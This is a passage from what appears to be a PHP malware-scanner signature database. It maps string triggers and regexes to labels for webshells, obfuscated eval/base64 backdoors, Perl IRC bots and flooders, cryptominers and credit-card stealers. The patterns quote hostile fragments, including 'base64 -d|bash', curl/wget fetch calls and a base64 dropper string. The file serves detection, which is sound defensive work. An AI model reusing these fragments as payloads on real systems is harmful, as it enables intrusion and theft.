					'$url.=$' => array(STR_CLEARFILE, 'php.backdoor.eval_gen.022', NULL),
				),
			),
		),

		'edoced_46esab' => array(STR_TRIGGER,
			'ecalper_rts' => array(STR_TRIGGER,
				'etalfnizg' => array(STR_CLEARFILE, 'php.backdoor.filesman.123', NULL),
			),
		),

		'inflate(".chr(' => array(STR_TRIGGER,
			'\$\w+\[\'(\w+)\'\]\((\$\w+)\[\'\1\'\]\[\d+\]\.\2\[\'\1\'\]\[\d+\]\.\2\[\'\1\'\]\[\d+\]\.\2\[\'\1\'\]\[\d+\]\.\2\[\'\1\'\]\[\d+\],\s*\$\w+\s*,\"\d{2,}\"\);' => array(REX_CLEARFILE, 'php.malware.generic.078', NULL),
		),

		'chr(98)' => array(STR_TRIGGER,
			'<\?php[\s]*\$[\w][\s]*=[\s]*chr\([^;]+chr\([\d]+\)[\s]*\.[\s]*chr\(' => array(REX_CLEAR_LINEMATCH, 'php.malware.chr_base64.002', '<\?php[\s]*\$[\w][\s]*=[\s]*chr\([^;]+chr\([\d]+\)[\s]*\.[\s]*chr\([^\n]+'),
		),

		'(isset($_SERVER[\'HTTPS\']) && $_SERVER[\'HTTPS\'] === \'on\' ?' => array(STR_CLEAR_MULTIMATCH, 'php.malware.stats_injector.002', 'function[\s]*[\w]+\(\)[\s]*\{\$[\w]+[\s]*=[\s]*.base64_decode.;[\s]*\$[\w]+[\s]*=[\s]*chr\([\d]*\)\.[^\?]+file_put_contents\(\$[\w]+,.<\?php[^\}]+\);[\s]*\}[\s]*\$[\w]+[^\}]+file_put_contents\(\$[\w]+,[\s]*time\(\)\);[\s]*\}[\s]*\}[\s]*else[\s]*\{[\w]+\(\);[\s]*file_put_contents\(\$[\w]+,[\s]*time\(\)\);[\s]*\}'),
		'file_get_contents(chr(104).chr(116).chr(116).chr(112).' => array(STR_CLEAR_LINEMATCH, 'php.malware.stats_injector.001', 'error_reporting\(0\);\s*ini_set\(chr[^;]+; echo @file_get_contents\(chr\(104\)\s*\.\s*chr\(116\)\s*\.\s*chr\(116\)[^;]+chr\(0?46\)\s*\.\s*chr\(106\)\s*\.\s*chr\(115\)\);'),
		'(\$\w+)\s*=\s*(chr\(\d{1,3}\)\.){20}[^;]+;(\$\w+)\s*=\s*(\1\[\d{1,3}\]\.)' => array(REX_CLEAR_MULTIMATCH, 'rex.chr_iframe.001', '(\$\w+)\s*=\s*(chr\(\d{1,3}\)\.){20}[^;]+;(\$\w+)\s*=\s*(\1\[\d{1,3}\]\.){10}[^;]+;(\$\w+)\s*=\s*(\1\[\d{1,3}\]\.){10}[^;]+;\3\(\5\(null,\s*(\1\[\d{1,3}\]\.){10}[^;]+\)\);'),
		';\$\w+=..x73.\.\$\w+\[\d\d\]\.chr\(' => array(REX_CLEAR_MULTIMATCH, 'rex.eval_COOKIE.005', '<\?php\s*(\$\w+)=[^\n]+;(\$\w+)=[^\n]+;(\$\w+)=..x73.\.\2\[\d+\]\.chr\(\d+\)\.[^\n]+\$\w+\(\1\);\s*\?>'),
		'"\x62".chr(97)."\x73".chr(101).chr(54)."\x34\x5F\x64e".chr(99)."\x6fde(\x22QG\x56\x79cm9\x79X\x33J\x6Cc\x479\x79d\x47\x6c\x75Zy\x67wK"' => array(STR_CLEARFILE, 'php.backdoor.eval_POST.090', NULL),
		'(\$\w+)\s*=\s*"[^"]+";\s*(\$\w+)\s*=\s*["evlxhra-fA-F0-9\\\\\\.\\(\\)_]+[(gzinflate\(\)\.\'\"\dx\\\chr)]+[(base64_decode\(\)\.\'\"\dx\\\chrA-F)]+;\s*(\$\w+)\s*=[^;]+;\s*(\$\w+)\s*=\s*[(assert\(\)chr\d\.\'\"\\\A-F)]+;\s*(\$\w+)\s*=\s*\2\.[\'"].[^"]+"\.\3\s*;\s*\@?\s*\4\s*\(\5\)\s*;' => array(REX_CLEAR_LINEMATCH, 'php.malware.hex_oct_obfuscation.003', '(\$\w+)\s*=\s*"[^"]+";\s*(\$\w+)\s*=\s*["evlxhra-fA-F0-9\\\\\\.\\(\\)_]+[(gzinflate\(\)\.\'\"\dx\\\chr)]+[(base64_decode\(\)\.\'\"\dx\\\chrA-F)]+;\s*(\$\w+)\s*=[^;]+;\s*(\$\w+)\s*=\s*[(assert\(\)chr\d\.\'\"\\\A-F)]+;\s*(\$\w+)\s*=\s*\2\.[\'"].[^"]+"\.\3\s*;\s*\@?\s*\4\s*\(\5\)\s*;'),
		'\$[\w]+[\s]*=[\s]*"[^"]{30,}";[\s]*\$[\w]+[\s]*=[\s]*[^\$]+chr\([\d]+\)\.[\s]*[\'"]\\\\x[a-f0-9]+[\'"][\s]*\.[^\$]+;[\s]*(\$[\w]+[\s]*=[^\$]+chr\([^\$]+;[\s]*)+\$[\w]+[\s]*=[\s]*\$[\w]+[\s]*\.[\'"]+[^\'"]{2000}' => array(REX_CLEAR_LINEMATCH, 'php.malware.generic.076', '\$[\w]+[\s]*=[\s]*"[^"]{30,}";[\s]*\$[\w]+[\s]*=[\s]*[^\$]+chr\([\d]+\)\.[\s]*[\'"]\\\\x[a-f0-9]+[\'"][\s]*\.[^\$]+;[\s]*(\$[\w]+[\s]*=[^\$]+chr\([^\$]+;[\s]*)+\$[\w]+[\s]*=[\s]*\$[\w]+[\s]*\.[\'"]+[^\'"]{2000}[^;]+;[\s]*@?\$[\w]+\(\$[\w]+\);'),
		'1X37W9tG0+jveZ78DxvXX2Q3xmAubWojAwXScJo' => array(STR_CLEARFILE, 'php.backdoor.webshell.183', NULL),
		'\$[\w]+[\s]*=[\s]*([\W][\w]*[\W]\.?)*;[\s]*\$[\w]+[\s]*=[\s]*array\(.{1000,}eval\(\$[\w]+\(\$[\w]+\(\$[\w]+\(..,\$[\w]+\)\)\)\);' => array(REX_CLEARFILE, 'php.spam-seo.doorway-gen.106', NULL),
		'ZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgiZU5xVlZndHoya1lRL2l2RXd4UTBKcTRraEVDbGF1' => array(STR_CLEARFILE, 'php.hacktool.ini_settings.002', NULL),
	),

	'."\x' => array(STR_TRIGGER, 

		'=("a"|".x61"|chr\(97\))\.("s"|".x73"|chr\(115\))\.("s"|".x73"|chr\(115\))\.("e"|".x65"|chr\(101\))\.("r"|".x72"|chr\(114\))\.("t"|".x74"|chr\(116\));' => array(REX_TRIGGER, 

			'=("b"|".x62"|chr\(98\))\.("a"|".x61"|chr\(97\))\.("s"|".x73"|chr\(115\))\.("e"|".x65"|chr\(101\))\.("6"|".x36"|chr\(54\))\.("4"|".x34"|chr\(52\))\.("_"|".x5f"|chr\(95\))\.("d"|".x64"|chr\(100\))\.("e"|".x65"|chr\(101\))\.("c"|".x63"|chr\(99\))\.("o"|".x6f"|chr\(111\))\.("d"|".x64"|chr\(100\))\.("e"|".x65"|chr\(101\));' => array(REX_TRIGGER, 
	
				'header\(\'Status: 404 Not Found\',TRUE\);' => array(REX_TRIGGER, 
					'if\(isset\(\$_POST\[chr\(100[^\{]+\{\$\w+=(?:"a"|".x61"|chr\(97\))\.(?:"s"|".x73"|chr\(115\))\.(?:"s"|".x73"|chr\(115\))\.' => array(REX_CLEAR_MULTIMATCH, 'rex.backdoor.rexec.002', 'if\(isset\(\$_POST\[chr\(100[^\{]+\{\$\w+=(?:"a"|".x61"|chr\(97\))\.(?:"s"|".x73"|chr\(115\))\.(?:"s"|".x73"|chr\(115\))\.[^:]++: 404 Not Found.,TRUE\);\s+\}\s+\}'),
				),
	
				'(\$+[\w]+=(([\'][\'])|(\.?".x[a-f0-9]{2}"\.?)|(\.?chr\([\d]+\)\.?)|(\.?"[\w#]"\.?))+;[\s]*){2,}[^\(]+(@?\$[\w]+\(\s)+[^;]+\)\);' => array(REX_CLEAR_MULTIMATCH, 'rex.backdoor.wso_shell.001', '.*'),
				'(?:\$+[\w]+=(([\'][\'])|(\.?".x[a-f0-9]{2}"\.?)|(\.?chr\([\d]+\)\.?)|(\.?"[\w#]"\.?))+;[\s]*)+[^#]+\)\);\s*[# ]+' => array(REX_CLEAR_MULTIMATCH, 'rex.backdoor.wso_shell.002', '.*'),
				'@\$\w+\(@\$\w+\(@\$\w+\(\$_POST\[("d"|".x64"|chr\(100\))' => array(REX_CLEAR_MULTIMATCH, 'rex.backdoor.assertdata.001', '(?:if\(isset\(\$_POST\[chr\(100[^\{]+\{)?\$\w+=(?:"a"|".x61"|chr\(97\))\.(?:"s"|".x73"|chr\(115\))\.(?:"s"|".x73"|chr\(115\))\.(?:"e"|".x65"|chr\(101\))\.(?:"r"|".x72"|chr\(114\))\.(?:"t"|".x74"|chr\(116\));\$\w+=(?:"b"|".x62"|chr\(98\))\.(?:"a"|".x61"|chr\(97\))\.("s"|".x73"|chr\(115\))\.(?:"e"|".x65"|chr\(101\))\.(?:"6"|".x36"|chr\(54\))\.[^\n]+\)\)\);die.(?:[^>]+header\(.Status: 404 Not Found[^\}]+\}\n\})?'),
			),
		),
	
		'(\$\w+)=(?:"c"|".x63"|".143")\.(?:"h"|".x68"|".150")\.(?:"r"|".x72"|".162");\$\w+=' => array(REX_CLEAR_MULTIMATCH, 'rex.backdoor.rexec.001','(\$\w+)=(?:"c"|".x63"|".143")\.(?:"h"|".x68"|".150")\.(?:"r"|".x72"|".162");[^\{]+\1[^\{]+\\\\x[^\{]+\\\\[\d][^\{]+\$\w+\(\);'),
		'\$[\w]+\(\$[\w]+\("[^"]{4000}[^;]+;[\s]*echo[\s]*"\{\$\{[\s]*eval[\s]*\(\$[\w]+\)[\s]*\}\}";' => array(REX_CLEARFILE, 'php.backdoor.WSO.013', NULL),
	),

	'".chr(' => array(STR_TRIGGER,

		'\x' => array(STR_TRIGGER,
			'function [\w]+\((\$[\w]+,[\s]*){2,}\$[\w]+\)[\s]*\{[\s]*return[\s]*(\$[\w]+\.[\s]*){2,}\$[\w]+;[\s]*\}[\s]*\$[\w]+[\s]*=' => array(REX_CLEARFILE, 'php.backdoor.webshell.145', NULL),
		),

		'<\?php[\s]*\$[\w]+[\s]*=[\s]*Array\([\s]*\'.\'[\s]*=>[\s]*\'.\',[\s]*[^\)]+\);[\s]*\$[\w]+[\s]*=[\s]*[\w]+\(\$[\w]+,[\s]*\$[\w]+\);[\s]*\$[\w]+[\s]*=[\s]*[^;]+chr\([\d]+[+-][\d]+\)[^;]+;[\s]*\$[\w]+\(\'\',[^;]+\);' => array(REX_CLEARFILE, 'php.backdoor.create_function.025', NULL),
	),

	'^ chr(' => array(STR_TRIGGER, 
		'=[\w]+\(array\(\d' => array(REX_TRIGGER, 
			'\$[\w]+\.\$[\w]+\.\$[\w]+' => array(REX_CLEAR_MULTIMATCH, 'rex.obfuscated_filesman.001', '.*'),
		),
	),

	'=range(1,' => array(STR_TRIGGER, 
		'=chr\(\$[\w]+\[96\]\)\.chr\(\$[\w]+\[114\]\)\.chr\(\$[\w]+\[114\]\)\.chr\(\$[\w]+\[100' => array(REX_TRIGGER, 
			'chr\(\$[\w]+\[94\]\)\.chr\(\$[\w]+\[79\]\)\.chr\(\$[\w]+\[78\]\)\.chr\(\$[\w]+\[82' => array(REX_CLEAR_MULTIMATCH, 'rex.obfuscated_functions.002', '(?:(\$\w+)=range\(1,[\d]+\);[\s]*(\$[\w]+)=chr\(\1\[96..\.chr\(\1\[114..\.chr\(\1+\[114..\.chr\(\1\[100..\.chr\(\1\[113..\.chr\(\1\[115\]\);)|@?\$[\w]+\(\$\{chr\((\$[\w]+)\[94\]\)\.chr\(\3\[79\]\)\.chr\(\3\[78\]\)\.chr\(\3\[82\]\)\.chr\(\3\[83\]\)[^;]+\]\)\]\);|echo \$b;'),
		),
	),

	'),"".chr(' => array(STR_TRIGGER,
		'$test($none, \'}\'.$' => array(STR_CLEARFILE, 'php.backdoor.webshell.160', NULL),
	),

	'HTTP_X_FORWARDED_FOR\',$_SERVER)){$ip=array_pop(explode' => array(STR_TRIGGER,
		'explode(\'|\',$pri_addr);if($long_ip >= ip2long($start)' => array(STR_CLEARFILE, 'php.spam-seo.redirect.115', NULL),
	),

	'Array("%#", chr(' => array(STR_TRIGGER,
		'ZW0uVGhyZWFkaW5nLlRocmVhZF06OkdldERvbWFpbigpLkxvYWQoJF8wKTskXzEuRW50cnlQb2ludC5pbnZva2UoJG51bGwsJG51bGwpOyIgJiBDaHJ3KDM0KSwwLGZhbHNlDQo=' => array(STR_CLEARFILE, 'vbs.malware.dropper.001', NULL),
	),

	'=chr(99).chr(104).chr(114);' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_POST.095', '\$[\w]+=chr\(99\)\.chr\(104\)\.chr\(114\);[\s]*\$[\w]+[\s]*=[\s]*\$[\w]+\([\d]+\)[\s]*\.[\s]*\$[^>]+\(..,[\s]*\$[\w]+\);[\s]*@?\$[\w]+\(\);'),
	'60,63,112,104,112,13,10,105,110,105,95,115,101,116,40,39,117,112,108,111,97,100,95,109,97,120,95' => array(STR_CLEARFILE, 'php.dropper.backdoor.001', NULL),
	')].self::$_PADCHAR);break;}return implode("",$' => array(STR_CLEARFILE, 'php.backdoor.eval_GET.002', NULL),
),

'!/usr/bin/perl' => array(STR_TRIGGER,

	'decode_base64' => array(STR_TRIGGER,

		'eval(decode_base64' => array(STR_TRIGGER,
			'eval(decode_base64(\'IyEvdXNyL2Jpbi9wZXJs' => array(STR_CLEARFILE, 'pl.hacktool.ddos-perl-ircbot.001.02', NULL), 
		),

		'system(decode_base64($' => array(STR_CLEARFILE, 'pl.backdoor.system_base64.001', NULL),
		'QnJ1d' => array(STR_CLEARFILE, 'pl.hacktool.bruteforce.004', NULL),
		'admin\@$ServerName' => array(STR_CLEARFILE, 'pl.backdoor.webshell.010', NULL),
	),

	'notice("$pn", "\001VERSION' => array(STR_TRIGGER,
		'sendraw($IRC_cur_socket,"PRIVMSG $printl :Nenhuma porta aberta foi encontrada");' => array(STR_CLEARFILE, 'pl.backdoor.shellbot.002', NULL),
	),

	'randpackets:' => array(STR_TRIGGER,
		'socket(crazy, PF_INET, SOCK_DGRAM, 17)' => array(STR_CLEARFILE, 'pl.hacktool.flooder.003', NULL),
	),

	'if ($^O eq "MSWin32") { $ewblock = 10035; $eiprogr = 10036;' => array(STR_TRIGGER,
		'my $sender = @{$b->{from}}[int rand scalar @{$b' => array(STR_CLEARFILE, 'pl.hacktool.mumblehard_spammer.001', NULL),
	),

	'print "\tcompleted' => array(STR_TRIGGER,
		'uid=0(root) gid=0(root) groups=0(root)' => array(STR_CLEARFILE, 'pl.backdoor.webshell.009', NULL),
	),

	'HTTP::Request->new(POST' => array(STR_TRIGGER,
		'wordpress_logged_in' => array(STR_CLEARFILE, 'pl.hacktool.bruteforce.002.02', NULL),
	),
	
	'eval unpack u=>q{_"G5S92!\'971O<' => array(STR_CLEARFILE, 'pl.hacktool.bruteforce.002', NULL),
	'DLCCyber Perl Shell' => array(STR_CLEARFILE, 'pl.backdoor.webshell.007', NULL), 
	'send(flood, pack("a$psize","' => array(STR_CLEARFILE, 'pl.hacktool.flooder.004', NULL),
	'print "Asmodeus Perl Remote Shell' => array(STR_CLEARFILE, 'pl.backdoor.Asmodeus.001', NULL),
	'print "IHS BACK-CONNECT BACKDOOR  \n\n";' => array(STR_CLEARFILE, 'pl.backdoor.IHS.001', NULL),
	'# cmd.pl: Run commands on a webserver' => array(STR_CLEARFILE, 'pl.backdoor.webshell.001', NULL),
	'\'\'=~(\'(?{\'.(\'vKY18Fv' => array(STR_CLEARFILE, 'pl.backdoor.webshell.004', NULL),
	'Satanic Socks Server' => array(STR_CLEARFILE, 'pl.backdoor.satanicsocks.001', NULL),
	'!bot @milw0rm' => array(STR_CLEARFILE, 'pl.hacktool.ircbot.006', NULL),
	'$login = crypt($WebShell::Configuration::password, $salt);' => array(STR_CLEARFILE, 'pl.backdoor.webshell.006', NULL),
	'} else { syswrite($client, "\x05\xFF", 2); };' => array(STR_CLEARFILE, 'pl.backdoor.webshell_gen.002', NULL),
	'$kola=$msr."/".$user;' => array(STR_CLEARFILE, 'pl.hacktool.configuration_stealer.001', NULL),
	'my $glink = ("www.google.co.uk/search?q=".&key($dork' => array(STR_CLEARFILE, 'pl.hacktool.information_gathering.002', NULL),
	'print "# Auto Rooting' => array(STR_CLEARFILE, 'pl.exploit.autoroot.001', NULL),
	'print "\n\n WORDPRESS BRUTE' => array(STR_CLEARFILE,'pl.hacktool.information_gathering.003', NULL),
	'if ( print $sock $primarypayload ) {' => array(STR_CLEARFILE,'pl.hacktool.flooder.002', NULL),
	'>CGI Shell</b> Connected' => array(STR_CLEARFILE,'pl.backdoor.cgitelnet-shell.003', NULL),
	'print "<code>Connection closed by foreign host.<br><br></code>";' => array(STR_CLEARFILE, 'pl.backdoor.cgitelnet-shell.004', NULL),
	'Cpanel Password Brute Forcer' => array(STR_CLEARFILE, 'pl.hacktool.cpanel_attack.001', NULL),
	'&xml_start($path,$bug,$dork,"GooGLeCA,GooGLeDE,GooGLeUK' => array(STR_CLEARFILE, 'pl.backdoor.shellbot.003', NULL),
	'<title>GO.cgi</title>' => array(STR_CLEARFILE, 'pl.backdoor.webshell.008', NULL),
	'?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folde' => array(STR_CLEARFILE, 'pl.hacktool.com_media-exploit.001', NULL),
	'.\'/httpdocs/wp-config.php\',$' => array(STR_CLEARFILE, 'pl.hacktool.configuration_stealer.003', NULL),	
),

'exec' => array(STR_TRIGGER,

	'exec &>/dev/null' => array(STR_TRIGGER,
		'export PATH=$PATH' => array(STR_TRIGGER,
			'd2web.org' => array(STR_CLEARFILE,'sh.malware.unix_cryptominer.001'),
			'onion.' => array(STR_CLEARFILE,'sh.malware.unix_cryptominer.002'),
			'darknet.' => array(STR_CLEARFILE,'sh.malware.unix_cryptominer.024'),
			'tor2web.' => array(STR_CLEARFILE,'sh.malware.unix_cryptominer.025'),
			'/lib/systemd/systemd-init' => array(STR_CLEARFILE,'sh.malware.unix_cryptominer.033'),
			'~/.systemd-init' => array(STR_CLEARFILE,'sh.malware.unix_cryptominer.034'),
			'grep -q "0.0.0.0 pastebin.com" /etc/hosts' => array(STR_CLEARFILE,'sh.malware.unix_cryptominer.035'),
			'grep -q "0.0.0.0 lsd.systemten.org" /etc/hosts' => array(STR_CLEARFILE,'sh.malware.unix_cryptominer.036'),
			'gKZmkK|base64 -d|bash' => array(STR_CLEARFILE,'sh.malware.unix_cryptominer.037'),
		),
	),

	'urlencode("$creditCardNumber|$expDate|$cvv2|$firstName $lastName' => array(STR_CHAIN_TRIGGER,
		'curl_setopt($secpay, CURLOPT_HEADER, 0); curl_setopt($secpay, CURLOPT_POSTFIELDS, "dm' => array(STR_CLEAR_MULTIMATCH, 'php.malware.cc_stealer.017', '\$secpay[\s]*=[\s]*curl_init\(\);[\s]*(curl_[^;]+\);[\s]*)+'),
		'urlencode("$creditCardNumber|$expDate|$cvv' => array(STR_CLEAR_LINEMATCH, 'php.malware.cc_stealer.017.02', '\$[\w]+[\s]*=[\s]*urlencode\("\$creditCard[^;]+\);'),
		'curl_exec($secpay);' => array(STR_CLEAR_LINEMATCH, 'php.malware.cc_stealer.017.03', 'curl_exec\(\$secpay\);'), 
	),

	'echo \'Done!\';' => array(STR_TRIGGER,
		'<body onload="SetFocus(\'cmd\')">' => array(STR_CLEARFILE, 'php.backdoor.webshell.141', NULL),
	),

	'.exec($_POST[\'executer\'])' => array(STR_CLEARFILE, 'php.backdoor.cmd_executer.001', NULL),
	'exec $SHELL || die print CONN' => array(STR_CLEARFILE, 'pl.backdoor.cgitelnet-shell.002', NULL),
	'prepare("SHOW DATABASES");$sth->execute;print "<b>DATABASES:</b>' => array(STR_CLEARFILE, 'pl.backdoor.webshell.003', NULL),
	'ini_set(\'log_errors\',0); ini_set(\'max_execution_time\',0);if(isset($_GET[gotop' => array(STR_CLEARFILE, 'php.backdoor.filesman.014', NULL),
	'has_php_suexec"] = true;}else{@touch' => array(STR_CLEARFILE, 'php.backdoor.generic.011', NULL),
	'exec(\'cd /tmp;' => array(STR_CLEARFILE, 'php.backdoor.webshell_gen.36', NULL),
	'>Pr1v4t3 Cpan3l Us3r Ch3cker' => array(STR_CLEARFILE, 'php.hacktool.cpanel_bruteforce.004', NULL),
	'check_sql_inj($h3h3,$argv[2]);' => array(STR_CLEARFILE, 'php.hacktool.sqlinjection.001', NULL),
	'@fwrite($fp, "installatron") !== 12 || @fwrite($fp, "installatron' => array(STR_CLEARFILE, 'php.exploit.sysinfo.005', NULL),
	'class TokenInitEx'=> array(STR_CLEARFILE, 'php.malware.generic.039', NULL),
	'$post_data[$upfile] = \'@\'. $_FILES[$upfile][\'tmp_name\'].\';filename=\'.$_FILES[$upfile][\'name\'].\';type=\'.$_FILES[$upfile][\'type\'];' => array(STR_CLEARFILE,'php.backdoor.uploader.044', NULL),
	'$data=validateDataFromStr($encrypt,$data);' => array(STR_CLEARFILE,'php.malware.magento-cc-stealer.023', NULL),
	'file_put_contents(MODX_CORE_PATH . "/model/modx/smarty/logo.png", base64_decode($_' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.modx-injector.002', 'if\s*?\(isset\s*?\(\s*?\$_[^\{]+?\{\s*?file_put_contents\(MODX_CORE_PATH \. "\/model\/modx\/smarty\/logo\.png", base64_decode\(\$_[^;]+?;\s*?exec[^;]+?;\s*?\}'),
	'popup-pomo.txt","",$str_get);' => array(STR_CLEARFILE,'php.backdoor.injector.106.02', NULL),
	'exec("sed -n \'/SORRYIMPOOR/,/IHAVENOJOB/p' => array(STR_CLEAR_MULTIMATCH, 'php.malware.cryptominer.005', '@exec\("pgrep[^;]+\$pid\);[\s]*if\(empty\(\$pid\)\)\{[\s]*exec\("sed -n ..SORRYIMPOOR[^\{]+\{@exec\("ps -ef[^@]+@\$[^;]+\;[\s]*@exec\("kill[^;]+\);\}'),
	'exec(\'if curl 127.0.0.1 -o /dev/null 2>/dev/null; then curl -o - http' => array(STR_CLEARFILE, 'php.backdoor.uploader.230', NULL),
	'exec(\'wget -r -k -l 1 --tries=1 -p -E -e robots=off -nc -U opera -b -i http' => array(STR_CLEARFILE, 'php.backdoor.exec.003', NULL),
	'if(filter_var($IPaddress,FILTER_VALIDATE_IP,FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)!==false){return $IPaddress;}}}}}function clientData' => array(STR_CLEARFILE, 'php.hacktool.phishbackend.008', NULL),
),

'pack(' => array(STR_TRIGGER,

	'_shaesx_' => array(STR_TRIGGER,

		'include("{$eb}.$algo");' => array(STR_CHAIN_TRIGGER,
			'@ini_set' =>array(STR_CLEAR_MULTIMATCH, 'php.backdoor.shaesx.001', '@ini_set\([^;]*display_errors[^;]*0[^\)]*\);.*?\{\$eb\}\.\$algo.\);[\s]*(@?unlink\(.\{\$eb\}\.[^;]+\);[\s]*|\$[\w]+[\s]*=[\s]*.[\w]+.;[\s]*|\/\/[\s]*[\w]+)*[\s\}]*'),
			'error_reporting\([^;]*0[^;]*\);[\s]*(@ini_set[^;]+\);[\s]*){1,2}' =>array(REX_CLEAR_MULTIMATCH, 'php.backdoor.shaesx.001.02', 'error_reporting\([^;]*0[^;]*\);[\s]*(@ini_set[^;]+\);[\s]*){1,2}'),
			'isset($_REQUEST["test_url"])' => array(STR_CLEARFILE, 'php.backdoor.shaesx.005', NULL),
		),

		'unlink' => array(STR_CHAIN_TRIGGER,
			'checkClass' =>array(STR_CLEAR_MULTIMATCH, 'php.backdoor.shaesx.003', 'if[\s]*\([\s]*!\$[\w]+checkClass[^\{]+\{[\s]*[^\}]*shaesx.+?eb\}\.\$algo.\);[\s]*@?unlink\([^;]+\);[\s]*(\$[\w]+[\s]*=[\s]*.[\w]+.;)*[\s\}]*'),
		),
		
		'("$apikey"),' => array(STR_CLEARFILE, 'php.backdoor.shaesx.002', NULL),
		'touch(\'.htaccess\', $actime);' => array(STR_CLEARFILE, 'php.backdoor.shaesx.004', NULL),
		'str_replace(\'!$' => array(STR_CLEARFILE, 'php.backdoor.shaesx.006', NULL),
		'$churl = "{$api}action=get_link&api_key=$apikey&group=$scheme&cat=' => array(STR_CLEARFILE, 'php.backdoor.shaesx.007', NULL),
	),

	'versio:' => array(STR_TRIGGER,

		'/e", ' => array(STR_TRIGGER,
			')){$GLOBALS[' =>array(STR_CLEAR_LINEMATCH, 'php.backdoor.determinator.004', '.\*versio:\d[^;]+(\$[QO0Il1]+)=\d+;\s*if\s*\(\!function_exists\(.([QO0Il1]+).\)\)\{\$GLOBALS\[.([10OQIL]+)[^\n]+function\s*(\2)[^;]+\3[^\n]+\2[^;]+;\};'),
		),

		'.\*versio:[^\*]+\*. \$GLOBALS\[.(\S+).\][^;]+;\s*if +\(!function_exists\(.(\w+).\)\)\{function \2[^;]+\$GLOBALS\[.\1' => array(REX_CLEAR_MULTIMATCH, 'rex.backdoor.determinator.005', '.\*versio:[^\*]+\*. \$GLOBALS\[.(\S+).\][^;]+;\s*if +\(!function_exists\(.(\w+).\)\)\{function \2[^;]+\$GLOBALS\[.\1.];\$\w+=pack\(.H\*[^\{]+\2[^;]+;\};'),
		'*/ $GLOBALS' => array(STR_CLEAR_MULTIMATCH,'php.backdoor.determinator.003', '.\\*versio:[^\\*]+\\*. \\$GLOBALS[^}]+};eval\\([\\w]+\\([\\d]+,[\\d]+\\)\\);};'),
		'aWYgKCFkZWZpbmVkKCJkZXRlcm1pbmF0b3IiKS' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.determinator.006', '\/\*versio:[^\n]+eval\(\$[\w]+\(.aWYg[^;]+\);'),
	),

	'substr(pack(\'H*\', sha1($' => array(STR_TRIGGER,

		'^ $this->' => array(STR_TRIGGER,
			'$len = strlen($' => array(STR_TRIGGER,
				'var \$[\w]+;[\s]*(var \$[\w]+[\s]*=[\s]*array\(([\'"][\w]+[\'"],[\s]*){2,}[\'"][\w]+[\'"]\);[\s]*){3,}var \$[\w]+[\s]*=[\s]*.[^\'"]{500}' => array(REX_CLEARFILE, 'php.malware.injector.067', NULL),
			),
		),

		'(wp_check_password($password, $hash)){' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.wp_login.005', '\$[\w]+[\s]*=[\s]*str_replace\([^\{]+function[\s]*[\w]+\(\$[\w]+,[^\}]+substr\(pack\(.H\*.,[\s]*sha1\(\$[\w]+\.\$[\w]+.\$[\w]+\)\)[^\}]+\}[\s]*return[\s]*\$[^\;]+;[\s]*\}[\s]*if[\s]*\(preg_match\(.\/wp-login\/.,[\s]*\$_SERVER[^;]+mktime\(([\d],?)+\);[\s]*setcookie\(.[\w]+.,[^\}]+\}[\s]*if[\s]*\(\$_POST[\s]*\[.[\w]+.\]!=[^;]+require_once\(\$_SERVER\[.DOCUMENT_ROOT.\][^\{]+mysqli_query\(.SELECT[\s]*user_pass[\s]*FROM[\s]*\{\$[\w]+\}users[\s]*where[\s]*user_login[\s]*=[\s]*.\{\$[\w]+\}[^\{]+if[\s]*\(wp_check_password\(\$[\w]+,[\s]*\$[\w]+\)\)[\s]*\{[\s]*mail\(\$[\w]+\(\$[\w]+[^\}]+\$[\w]+\);[\s]*\}[\s]*\}[\s]*\}'),
	),

	'import socks' => array(STR_TRIGGER,
		'googlebot.com' => array(STR_TRIGGER,
			'self.tor = tor' => array(STR_CLEARFILE,'py.hacktool.ddos.001'),
		),
	),

	'Referer: http://{$url[\'host\']}' => array(STR_TRIGGER,
		'if ($type == \'html\' && strpos($result, "<!-- a:")' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.070', NULL),
	),

	'unpack(\'u*\',$' => array(STR_TRIGGER,
		'.=$_ while(<DATA>);' => array(STR_CLEARFILE, 'php.malware.component.017', NULL),
	),

	'unlink($_SERVER[\'DOCUMENT_ROOT\'].$_SERVER[\'PHP_SELF\']);' => array(STR_TRIGGER,
		'pack( "H*", substr(' => array(STR_CLEARFILE, 'php.malware.component.022', NULL),
	),

	'eval(' => array(STR_TRIGGER,
		'pack(\'H*\',\'20246a' => array(STR_CLEARFILE, 'php.malware.redirect.042', NULL),
	),

	'$_=new Echoes;exit($_->_($Data,$Key,$md5));' => array(STR_CLEARFILE, 'php.backdoor.eval_REQUEST.040', NULL),
	'{ $x .= pack(\'H*\', substr($' => array(STR_CLEAR_MULTIMATCH, 'php.malware.generic.080', 'function [\w]+\(\$[\w]\)[\s]*\{[\s]*\$x[\s]*=[\s]*..;[\s]*for[\s]*\(\$[^,]+,[\s]*\$[\w][\s]*=[\s]*strlen\(\$[\w][^{]+\{[\s]*\$x[\s]*\.=[\s]*pack\(.H\*.,[\s]*substr[^}]+\}[\s]*return \$x;[\s]*\}[^;]+;[^;]+;[^;]{200}[^;]+;[\s]*(\$[\w]+\(\);[\s]*)?(\/\*[\s]*[\w]+[\s]*\*\/)?'),
	'24T677871Y716Bd7K4203d2G041Y7R2726Q179282N77Z661I6E4667J6' => array(STR_CLEARFILE, 'php.backdoor.eval_POST.104', NULL),
	'2S4H79786d6D6E7W0203d204K17O2726T179282D7F726a6eJ72722S7T3Ld3e2D7R73' => array(STR_CLEARFILE, 'php.backdoor.eval_POST.115', NULL),
	'$cre_f=$abc(\'\',$pack("H*' => array(STR_CLEAR_MULTIMATCH, 'php.malware.cc_stealer.002', 'if[\s]*\(!function_exists\(._[\w]+.\)\)[\s]*\{[\s]*if\(function_exists[^=]+\$[\w]+[\s]*=[\s]*.r.\..e.\..g.\..i.\.[^\*]+\$[\w]+=\$[\w]+\(..,\$[\w]+\(.H\*.,.[\w]+.\)\);[\s]*\$[\w]+\(\);[\s]*\}[\s]*\$[\w]+\(._[\w]+.\);[\s]*\}'),
	'class Foo { function __construct() { $claster = $this->module(' => array(STR_CLEARFILE, 'php.backdoor.cookie.007', NULL),
